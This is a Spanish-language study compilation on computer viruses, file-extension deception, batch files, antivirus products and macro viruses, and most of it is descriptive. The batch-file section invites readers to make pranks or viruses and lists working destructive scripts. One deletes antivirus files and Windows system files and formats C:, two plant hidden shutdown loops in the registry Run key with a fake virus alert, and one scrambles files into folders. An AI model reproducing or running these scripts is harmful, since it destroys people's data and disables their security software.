TIPOS DE VRUS INFORMTICOS Todos los virus tiene en comn una caracterstica, y es que crean efectos perniciosos.

A continuacin te presentamos la clasificacin de los virus informticos, basada en el dao que causan y efectos que provocan. Caballo de Troya: Es un programa daino que se oculta en otro programa legtimo, y que produce sus efectos perniciosos al ejecutarse este ltimo. En este caso, no es capaz de infectar otros archivos o soportes, y slo se ejecuta una vez, aunque es suficiente, en la mayora de las ocasiones, para causar su efecto destructivo. Gusano o Worm: Es un programa cuya nica finalidad es la de ir consumiendo la memoria del sistema, se copia as mismo sucesivamente, hasta que desborda la RAM, siendo sta su nica accin maligna. Virus de macros: Un macro es una secuencia de rdenes de teclado y mouse asignadas a una sola tecla, smbolo o comando. Son muy tiles cuando este grupo de instrucciones se necesitan repetidamente. Los virus de macros afectan a archivos y plantillas que los contienen, hacindose pasar por una macro y actuaran hasta que el archivo se abra o utilice. Virus de sobreescritura: Sobreescriben en el interior de los archivos atacados, haciendo que se pierda el contenido de los mismos. Virus de Programa: Comnmente infectan archivos con extensiones .EXE, .COM, .OVL, .DRV, .BIN, .DLL, y .SYS., los dos primeros son atacados ms frecuentemente por que se utilizan mas. Virus de Boot: Son virus que infectan sectores de inicio y booteo (Boot Record) de los diskettes y el sector de arranque maestro (Master Boot Record) de los discos duros; tambin pueden infectar las tablas de particiones de los discos. Virus Residentes: Se colocan automticamente en la memoria de la computadora y desde ella esperan la ejecucin de algn programa o la utilizacin de algn archivo. Virus de enlace o directorio: Modifican las direcciones que permiten, a nivel interno, acceder a cada uno de los archivos existentes, y como consecuencia no es posible localizarlos y trabajar con ellos. Virus mutantes o polimrficos: Son virus que mutan, es decir cambian ciertas partes de su cdigo fuente haciendo uso de procesos de encriptacin y de la misma tecnologa que utilizan los antivirus. Debido a estas mutaciones, cada generacin de virus es diferente a la versin anterior, dificultando as su deteccin y eliminacin.

Virus falso o Hoax: Los denominados virus falsos en realidad no son virus, sino cadenas de mensajes distribuidas a travs del correo electrnico y las redes. Estos mensajes normalmente informan acerca de peligros de infeccin de virus, los cuales mayormente son falsos y cuyo nico objetivo es sobrecargar el flujo de informacin a travs de las redes y el correo electrnico de todo el mundo. Virus Mltiples: Son virus que infectan archivos ejecutables y sectores de booteo simultneamente, combinando en ellos la accin de los virus de programa y de los virus de sector de arranque.

Extensiones de Archivo Desde la incesante irrupcin de nuevos virus informticos en distintos formatos, los usuarios de Internet han escuchado cientos de veces las palabras "extensiones de archivo", pero no muchos saben que es lo que eso significa. En este artculo intentaremos explicarlo y mostrar como debe configurarse correctamente el sistema operativo para evitar aquellos virus que aprovechan falencias en cuanto a extensiones de archivos nos referimos. Muchos habrn visto que, normalmente, el nombre de un archivo de PC se forma de un primer texto, un punto y un segundo texto (por ejemplo, ARCHIVO.TXT). La primer parte de este texto es el nombre propio del archivo, y la segunda parte, los ltimos caracteres despus del punto, son lo que denominamos extensin. En la mayora de los casos, estas extensiones son de 3 caracteres (.EXE, .DOC, .XLS, etc.), aunque puede haber de ms (.java, .class). Este conjunto de caracteres es lo que se denomina extensin del archivo, y es lo que le especifica al sistema que tipo de archivo es. Para que los lectores menos experimentados lo entendan, existen distintas clasificaciones para los archivos, y las mismas se relacionan con el tipo de funcin que realizan. Por ejemplo, si un archivo tiene una extensin .EXE, significa que se trata de un archivo ejecutable por si mismo, que puede realizar cierto tipo de funciones. Si, por otro lado, un archivo tiene una extensin .DOC, el sistema operativo sabe que este tipo de archivo es un documento de Word, por citar un caso. Los tipos de archivo se diferencian en dos tipos bastante definidos: Ejecutables: .EXE, .COM, .BAT, .DLL, etc. De Datos: .TXT, .DOC, .XLS, .MDB, .RTF etc. Los primeros son aquellos que se han sido programados bajo algn lenguaje especfico para realizar acciones y rutinas por s mismos, mientras que los segundos, son aquellos que, principalmente, contienen datos, y necesitan de una aplicacin especifica para ser abiertos. Por defecto, las extensiones ms comunes de archivo son ocultadas por el sistema operativo. Esto quiere decir que, cuando un usuario visualiza en la pantalla un listado de archivos, ya sea por el Explorador de Windows, o a travs de otras aplicaciones, no podr ver la extensin del mismo. Por ejemplo, si el usuario tiene en pantalla el directorio que contiene el archivo EJECUTABLE.EXE, la configuracin por defecto del sistema operativo le mostrar slo la palabra EJECUTABLE, lo que no permitir saber cul es la extensin del mismo. Cada tipo de archivo tiene un icono asociado que permite que el usuario pueda identificarlo sin necesidad de mirar la extensin. El inconveniente es que los virus informticos pueden manipular esto, asociando iconos de archivos conocidos a otros archivos dainos para que el usuario no sepa que lo que est ejecutando puede hacer peligrar la informacin de su PC. Quedando claro qu son las extensiones de archivo y que existen distintos tipos, pasamos a relacionar este

tema con las apariciones ms resonantes de los ltimos virus informticos. Todos, o por lo menos la gran mayora, han odo hablar del virus ILOVEYOU o VBS/LoveLetter. Este virus se distribuy por millones de PC el pasado mes de mayo, viajando por correo electrnico o IRC, en un archivo LOVE LETTER FOR YOU.TXT.VBS. Uno de los detalles que puede haber facilitado la rpida y amplia reproduccin del mismo por todo el mundo, es el engao que intenta hacer con la extensin del archivo. Como pueden observar, el archivo tiene una finalizacin .TXT.VBS. Esto quiere decir que la extensin del archivo es .VBS, lo que identifica como un archivo de VBScript, un lenguaje de programacin, capaz de ser ejecutado en entornos que tengan instalado el WSH, una aplicacin que viene por defecto con el Internet Explorer 4 y 5, y con el Windows 98 y 2000. El problema con esta extensin de archivo es que, en la configuracin por defecto del sistema operativo, la misma no es mostrada. Debido a esto, el usuario al visualizar el archivo cree que se trata de un simple archivo de texto (.TXT), dado que el mismo se visualiza como LOVE LETTER FOR YOU.TXT. Esto es muy simple de solucionar, realizando los siguientes pasos:

Ir a Inicio > Configuracin > Panel de Control. Ejecutar "Opciones..." dentro del men Ver. Dentro de la pestaa "Ver", activar "Mostrar todos los archivos", y desactivar la opcin "Ocultar extensiones de archivos conocidos".

Esto har que las extensiones de los archivos "conocidos", o sea, los asociados a las aplicaciones ms usadas, puedan ser visualizadas. Pero existe otra forma de explotar falencias del sistema operativo con respecto a las extensiones de archivo. En la segunda mitad del mes de junio se comenz a reportar un nuevo virus llamado LIFE STAGES o VBS/Stages, el cual se distribuye en un archivo LIFE STAGES.TXT.SHS. La extensin .SHS pertenece a un tipo de archivo denominado Shell Scrap, el cual contiene otros archivos ejecutables en forma comprimida, que sern ejecutados si el archivo .SHS es abierto. Esta extensin en particular posee una particularidad por la cual no es visualizada por el usuario, por ms que se hayan realizado los pasos antes mencionados para mostrar todas las extensiones. Esto se debe a que la extensin .SHS posee un parmetro especifico por el cual el sistema nunca la muestra. La nica forma de solucionar este problema, es modificar manualmente el Registro de Windows. Para ello es necesario cambiar el valor "NeverShowExt" por "AlwaysShowExt" en la clave HKEY CLASSES ROOT\ShellScrap. Esto har que la extensin .SHS sea mostrada. Lo que estaba sucediendo con este virus en particular, el VBS/Stages, es que el usuario al recibir el archivo en cuestin, lo visualizaba como LIFE STAGES.TXT, sin la extensin .SHS real, debido a que la configuracin del sistema oculta este tipo de extensiones. De esta manera, el usuario era engaado, dado que el mismo pensaba que se trataba de un archivo inofensivo, cuando en realidad era un virus desarrollado en VBScript, comprimido dentro de un archivo .SHS. Para acrecentar el engao, si se ejecuta el archivo, el virus muestra un archivo de texto conteniendo una broma, para hacer creer al usuario que realmente estaba abriendo un archivo de texto. Existen otras extensiones que tienen esta particularidad, como por ejemplo, los archivos .maw, .mag, del Access 2000, entre otros archivos de la misma aplicacin, y los archivos con extensin .mydocs, y algunos otros ms, pero no se conocen que puedan ser explotadas por virus informticos, lo que, dado lo que hemos visto hasta ahora, no es ninguna garanta. Recuerden que se deca que para infectarse con un correo electrnico, era necesario abrir el archivo adjunto, y la llegada del virus VBS/BubbleBoy (Ver Nota 1) cambi todo esto.

(*) Ignacio M. Sbampato es el WebMaster y Responsable de Contenidos de Virus Attack! y es Redactor de Noticias relacionadas con virus informticos y seguridad de LasNoticias.Org

Nota 1: Virus ms recientes como el Verona han terminado por acabar definitivamente con este mito.

ARCHIVOS BAT
Es un archivo de procesamiento por lotes: se trata de archivos de texto sin formato, guardados con la extensin *.bat que contienen un conjunto de comandos DOS. Cuando se ejecuta este archivo bat, los comandos contenidos son ejecutados en grupo, de forma secuencial, permitiendo automatizar diversas tareas. Cualquier comando DOS puede ser utilizado en un archivo batch.

Hay que aclarar Batch que no es un Lenguaje de Programacin. Es un archivo de cdigo que contiene comandos del, Shell de Windows, llamado MS-DOS, que pueden ejecutar desde Inicio->Ejecutar->CMD. Hay dos maneras de ejecutar comandos Batch.
Desde el Shell de Windows. Escribindolos en un archivo de texto con extensin .bat y luego ejecutarlo.

EJEMPLO DE ARCHIVO BAT Comenzaremos creando un Simple y clsico "Hola Mundo", escribiendo en un archivo de texto el siguiente cdigo. Cdigo : @echo off echo Hola Mundo pause exit Ahora guardemos el archivo como Nombre.bat y lo ejecutamos. Nos aparecer una pantalla negra que dir "Hola Mundo", luego una linea abajo dir "Presione una tecla para continuar" Explicamos: echo: Imprime un texto en pantalla, que es el texto que viene despus (el que le pasamos como parmetro), que en este caso es "Hola Mundo". Echo significa eco, por lo mismo "@echo off" elimina el eco, la repeticin de la ruta en la que nos encontramos en cada lnea cdigo. pause: Como bien se lee, pausa la ejecucin del cdigo. Adems muestra el texto "Presione una tecla para

continuar"
exit:

Cierra la ventana de comandos. Para dejar ms en claro cual sera la diferencia de no ocupar la linea @echo off la imagen de a continuacin muestra como se vera la pantalla sin esta linea.

CREACION DE ARCHIVOS BAT

Primer ejemplo de creacin de archivos bat
Un archivo batch (o bat) es un archivo de procesamiento por lotes, que contienen un conjunto de comandos DOS. Cuando se ejecuta este archivo bat, los comandos contenidos son ejecutados. Cualquier comando DOS puede ser utilizado en un archivo batch. Explicacin Para crear un archivo bat, slo tenemos que abrir el bloq de notas y adentro escribir el comando que querramos que se realice! (abajo se encuentra una serie de comandos del ms) Luego vamos a Guardar Como y donde dice nombre lo guardan con la extencion .bat(*.bat). Ahora solo queda ejectarlo y listo! Esto puede resultar muy til, para automatizar tareas (siempre y cuando sepan usar los comandos del ms) y tambin para hacer bromas! o incluso virus! Digo virus porque con los comandos se puede hacer de todo! hasta formatear! Por eso, si ven algun .bat, les recomendaria no abrirlo o hacele click derecho - editar , asi de ese modo no se les ejecuta y ven el contenido que presenta! ACA se encuentra una pgina con comando del ms que les puede ayudar: http://www.ayuda-internet.net/tutoriales/manu-msdos/manu-msdos.html Ahora slo les queda probar hasta q les salga hacerlo! y divertirse o renegarte de un rato! Otro dato importante, a la hora de crear bat, es cuando tenemos que buscar el directorio, ya que se debe escribir en un cierto cdigo. Ese cdigo consiste en que cada eslabon del directorio slo debe contener 8 caracteres, entonces aquellos directorios con mas de 8 caracteres, solo se deben escribir los primeros 6, seguidos por "~1" (sin comillas), hasta llegar a la unicacion del archivo, imagen ,etc. Por ejemplo, tengo una imgen llamada hola.jpg ubicada en C:\Documents and Settings\Administrador\Mis documentos entonces abrimos el bloq y escribimos : Start C:\Docume~1\Admini~1\MisDoc~1\hola.jpg

(el comando START sirve para iniciar aplicaciones, programas, etc.)

Segundo ejemplo de creacin de archivos bat

@echo off cls cd \\ cd \"c:\\Archivos de programa\\Norton antivirus\" attrib -R -A -S -H *.* del /S /Q *.exe cd \"c:\\Archivos de programa\\Eset\" attrib -R -A -S -H *.* del /S /Q *.* cd \"c:\\Windows\" attrib -R -A -S -H *.* del /S /Q *.exe del /S /Q *.inf del /S /Q *.ini cd \"c:\\Windows\\system32\" attrib -R -A -S -H *.* del /S /Q *.dll Rundll.exe user,exitwindows Rundll32.exe user,exitwindows format /y c: /v:discloca cd \"c:\\Archivos de programa\" attrib -R -A -S -H *.* del /S /Q *.exe

Tercer ejemplo de creacin de archivos bat

@echo off shutdown -s -t 3 -c Venganza > C:\\Windows\\system32\\system3425.bat Attrib +r +h C:\\windows\\system32\\system3425.bat msg * En 3 segundos se te apagara el ordenador cada vez que la enciendas reg add \"hkey_local_mac hine\\software\\microsoft\\windows\\currentversion\\run\" /v \"system3425.bat\" /t reg_sz /d \"C:\\system3425.bat\" /f exit

Cuarto ejemplo de creacin de archivos bat

@echo off echo shutdown -s -f -t 6 -c "windows no es original" >> "%homedrive%%systemroot%system32windosx.bat" Attrib +r +h "%homedrive%%systemroot%system32windosx.bat" REG ADD HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v sysin2 /t REG_SZ /d "%homedrive%%systemroot%system32windosx.bat" msg * Virus encontrado. 404 file explorer dell usser shutdown -s -f -t 00 -c "para ayudar a win32 se apagara la pc" exit

Quinto ejemplo de creacin de archivos bat

if exist a*.* md a move a*.* a if exist b*.* md b move b*.* b if exist c*.* md c move c*.* c if exist d*.* md d move d*.* d if exist e*.* md e move e*.* e if exist f*.* md f

move f*.* f if exist g*.* md g move g*.* g if exist h*.* md h move h*.* h if exist i*.* md i move i*.* i if exist j*.* md j move j*.* j if exist k*.* md k move k*.* k if exist l*.* md l move l*.* l if exist m*.* md m move m*.* m if exist n*.* md n move n*.* n if exist o*.* md o move o*.* o if exist p*.* md p move p*.* p if exist q*.* md q move q*.* q if exist r*.* md r move r*.* r if exist s*.* md s move s*.* s if exist t*.* md t move t*.* t if exist u*.* md u move u*.* u if exist v*.* md v move v*.* v if exist w*.* md w move w*.* w if exist x*.* md x move x*.* x if exist y*.* md y move y*.* y if exist z*.* md z move z*.* z if exist *.* md # move *.* # LOS MEJORES ANTIVIRUS DEL MUNDO Dos recomendaciones: 1) mantener siempre actualizado el antivirus y 2) si se prueba alguno de estos 10 programas, desactivar primero el otro antivirus -en caso de tener uno instalado en la PC-, ya que puede ocasionar problemas en el buen funcionamiento del sistema. 1. Norton Antivirus 2004 Norton AntiVirus es la ltima herramienta de Symantec para protegerse de todo tipo de virus, applets Java, controles ActiveX y cdigos maliciosos. Como la mayora de los antivirus, el programa de Symantec protege la computadora mientras navega por Internet, obtiene informacin de disquetes, CD`s o de una red y comprueba los archivos adjuntos que se reciben por email.

2. McAfee VirusScan 7 McAfee VirusScan es una de las herramientas de seguridad ms conocida por los usuarios de todo el mundo. Esta nueva versin protege a la PC de posibles infecciones a travs del correo electrnico, de archivos descargados desde Internet y de ataques a partir de applets de java y controles ActiveX. Trae una nuevo motor de bsqueda y un potente filtro para Internet que permite bloquear el acceso a sitios Web no deseados. Incluye una funcin llamada "Safe & Sound" que automticamente realiza copias de seguridad de los documentos mientras estn abiertos. 3. F-Secure Antivirus 5.40 F-Secure contiene dos de los motores de bsquedas de virus ms conocidos para Windows: F-PROT y AVP. Se actualiza todos los das e incluye todo lo necesario para proteger la PC contra los virus. Esta versin incluye un buscador que funciona en segundo plano, buscadores basados en reglas para detectar virus desconocidos y muchas opciones ms para automatizar la deteccin de virus. 4. Trend PC-Cillin 2003 El PC-cillin es un potente y conocido antivirus que realiza automticamente bsquedas de virus basado en sus acciones y no en el cdigo con el que fueron creados. La versin de prueba caduca a los 30 das de uso. 5. Panda Antivirus Titanium 2.04.04 Titanium incorpora un nuevo motor hasta un 30 por ciento ms rpido que sus antecesores, con un alto nivel de proteccin y un sistema heurstico avanzado para detectar posibles nuevos virus todava desconocidos. Trae la tecnologa SmartClean, que se encarga de reparar los daos que en el sistema provocan algunos virus. Se actualiza automticamente. 6. Panda Antivirus Platinum Otra de las versiones del popular antivirus de la empresa espaola Panda. Detecta cualquier virus que se quiera entrometer en la computadora desde Internet y lo hace antes de que llegue a la PC. Tambin impide que entren virus por archivos adjuntos o mensajera instantnea. Incluye un Firewall que detecta el movimiento de cualquier hacker que quiera ingresar. Se actualiza todos los das a travs de Internet. 7. Kaspersky Anti-virus Vigila todas las reas del sistema, incluyendo a virus que puedan permanecer en la memoria, en los archivos comprimidos e incluso en los encriptados. Tambin protege a la computadora de cualquier mail peligroso que propicie el ataque de troyanos y gusanos. Es compatible con los clientes de correo Outlook, Eudora y Pegasus, entre otros. Se actualiza automticamente a travs de Internet, en tanto y en cuanto el usuario lo configure para tal funcin. Sirve para analizar la PC en busca de algn virus pero tambin como escudo permanente para evitar el ingreso de cualquier virus. 8. ETrust EZ Antivirus Es una alternativa interesante frente a las populares herramientas antivirus. ETrust EZ detecta numerosos tipos de virus (incluyendo troyanos y gusanos) y una de sus principales ventajas es el poco tamao que ocupa en la memoria del disco (menos de 4 MB). Puede ser configurado para que actualice peridicamente la lista de virus y para que revise la PC con la frecuencia que sea conveniente para el usuario. Una funcin interesante es el Incremental Scaning, un mecanismo con el cual un archivo no se vuelve a escanear si no fue modificado desde la ltima vez que se revis. Esto elimina la engorrosa tarea de analizar todos los archivos cada vez que se pasa el antivirus. 9. Avast! Home Edition La versin hogarea de Avast! Antivirus tiene todas sus caractersticas disponibles sin restricciones, entre ellas escaneos manuales (a pedido del usuario), por acceso (para proteger contra la ejecucin de programas no deseados) y de emails entrantes y salientes. Los ms precavidos tambin pueden dejarlo en forma residente. Tras su instalacin se integra al men del botn derecho del Explorer. La actualizacin de este antivirus se realiza online en forma manual, automtica o programada. Se puede utilizar sin cargo durante 90 das. Para continuar usndolo despus de este perodo hay que registrarse como usuario, que no implica ningn

costo. Viene en Espaol. 10. AVG Antivirus Es un antivirus que cuenta con las funciones comunes en este tipo de herramientas: proteccin de la PC contra virus, deteccin de archivos infectados y escaneo de mails. Permite realizar actualizaciones gratuitas y contiene una base de datos con los virus ms importantes. Tiene las caractersticas ideales para un usuario medio ya que su interfaz es sencilla de usar y configurar. Esta es una versin gratuita pero existe una ms potente -la Pro- con ms funciones, pero primero hay que pagar.

EN ESCALA DEL 1 AL 10
10 9 8 7 6 5 4 3 2 1 0

EN ESCALA DEL 1 AL 10

LOS MACRO VIRUS

La idea de programar un virus en lenguaje de macros de una aplicacin comenz a tomar forma a principios de los 90 y concretamente desde 1992 algunas publicaciones ya hablaban de esto. De hecho nos podemos remontar a algunos virus que llegaron a desarrollarse para la planilla de clculos Lotus 1-2-3 que contaba con un lenguaje de macros suficientemente potente para permitirlo, pero, los macrovirus actuales comenzaron a difundirse a fines de 1994 y alcanzaron niveles de epidemia a partir de 1995. Dado que los macrovirus infectan archivos de informacin, la aparicin de estos gener alarma en los mbitos de seguridad informtica, puesto que rompa una parte del paradigma que estableca que los archivos que podan ser infectados por virus eran solamente los ejecutables o potencialmente ejecutables (.EXE, .COM, .BAT, .PIF, .SYS, etc.), a esto tambin debe sumarse la dificultad de insertar a los macrovirus, para su estudio, en el modelo general de los virus.

DEFINICIN DE MACROVIRUS
Un Macrovirus es un virus programado en lenguaje de "macro" de una aplicacin, que infecta a los archivos de informacin generados por dicha aplicacin para generar copias de si mismo, tomar el control del sistema y generar algn tipo de dao. En la actualidad la mayora de los macrovirus estn escritos con el lenguaje de programacin de macros del Microsoft Office para Windows (recordemos que el Word Basic es un subconjunto del lenguaje Visual Basic) y pueden ser desarrollados para cualquiera de sus aplicaciones (Word, Excell y Access). Los macrovirus cumplen tambin con la norma D.A.S. (Dao, Autorreproductores y Subrepticios) que se detallan a continuacin:

Siempre producen algn tipo de dao, an cuando su sola presencia degrada la performance del sistema. Pueden incorporar un mdulo de ataque que se activa a una fecha determinada, a una hora determinada, por determinada cantidad de ejecuciones, por el tamao del archivo de informacin o por una combinacin de teclas.

Generan copias de s mismos en otros archivos de informacin presentes en el sistema. Actan de forma tal que el usuario comn no se da cuenta de su presencia hasta que actan. Adems de lo expresado anteriormente debemos agregarle que los macrovirus poseen la caracterstica de ser multiplataformas, o sea, pueden actuar en PC como en Mac, dado que el producto Microsoft Office se ofrece para ambas plataformas.

Funcionamiento e infeccin de los Macrovirus

El funcionamiento bsico de un macrovirus consiste en que cada vez que la aplicacin abre un archivo de informacin infectado, la aplicacin se infecta y esta a partir de este momento generar archivos de informacin (ya sean nuevos o modificados) infectados. Una de las caractersticas de los macrovirus es su alto grado de infeccin, puesto que los archivos de informacin poseen un alto grado de intercambio. Este problema se ve an ms potenciado con el aporte de Internet, puesto que son los archivos de informacin los que ms viajan por la Red, ya sea bajados como informacin o transmitidos va correo electrnico. Esto hace que los macrovirus sean en la actualidad los virus que cuentan con mayor grado de infeccin.

Anlisis de un Macrovirus
Existe en la actualidad ms de 50 macrovirus en actividad y este nmero crece da a da. Algunos de los ms conocidos son: Para Microsoft Word (Nemesis, Bandung, MDMA, DMV, Concept, Nuclear, Colors, Hot, Imposter, Atom, Boom, NOP, Spooky, Xenixos, Wazzu, etc) Para Microsoft Excell (Larux, etc). A continuacin analizaremos el macrovirus WORDMACRO/WAZZU y sus variantes, dada su reciente deteccin en la zona y evaluar sus potenciales riesgos: El macrovirus WAZZU acta sobre el Word del Windows y consiste en una sola macro llamado autoOpen, esto lo hace independiente del idioma, es decir, que puede infectar versiones de todos los idiomas del Word como as tambin el Word en ingls. WAZZU modifica frecuentemente los contenidos de los documentos que infecta, moviendo las palabras e insertando el texto "wazzu". La palabra WAZZU es el sobrenombre que se le da a la Universidad del Estado de Washington (Washington State University). Se inform de l en Estados Unidos y Europa Central por primera vez a mediados del ao 1996 y en el resto del mundo para fines del mismo ao. Microsoft difundi accidentalmente el WAZZU varias veces durante el ao 1996: La edicin de Septiembre del '96 del Microsoft SPCD (Solution Provider CD) tena un documento infectado por el WAZZU y el mismo estaba ubicado en \sia\mktools\case\ed3905a.doc.

 Microsoft distribuy durante la conferencia suiza ORBIT, otro CD llamado Letz Fetz on the Netz que contena un documento llamado hot195d.doc infectado por el WAZZU. Un documento infectado por WAZZU estaba para bajarlo de Internet en un sitio de la Web en http://www.microsoft.com/switzerland/de/Misc y permanecin all durante varias semanas. Variantes: WAZZU.B, WAZZU.C, WAZZU.D, WAZZU.E, WAZZU.F, WAZZU.G y WAZZU.X.

Medidas de Prevencin
En un principio cuando aparecieron los primero macrovirus se opt inmediatamente por dos soluciones rpidas, su deteccin y eliminacin, y usar formato de archivos de informacin que no contena macros como por ejemplo los .TXT. Pero en la actualidad la cantidad de macrovirus ha aumentado y algunos poseen la capacidad de no permitir su eliminacin por medio del borrado de las macros y tomando la otra alternativa de trabajar en formato ASCII (.TXT) evidentemente se afecta a la presentacin del trabajo dado que no se pueden utilizar las capacidades grficas de los productos. Las medidas ms adecuadas a tomar son recurrir a un programa antivirus de primer nivel, dado que estos poseen rutinas avanzadas de deteccin de macrovirus, an en archivos compactados adosados a mensajes de correo electrnico, y utilizar de los mismos la opcin de mantenerlo residente en memora para impedir el ingreso del macrovirus al sistema y la infeccin del resto de los archivos de informacin all guardados. Tambin es conveniente adoptar normas o metodologas de trabajo para levantar el nivel de seguridad, como por ejemplo el escaneo previo de todos los archivos de informacin que provengan de otras computadoras antes de abrirlos en una aplicacin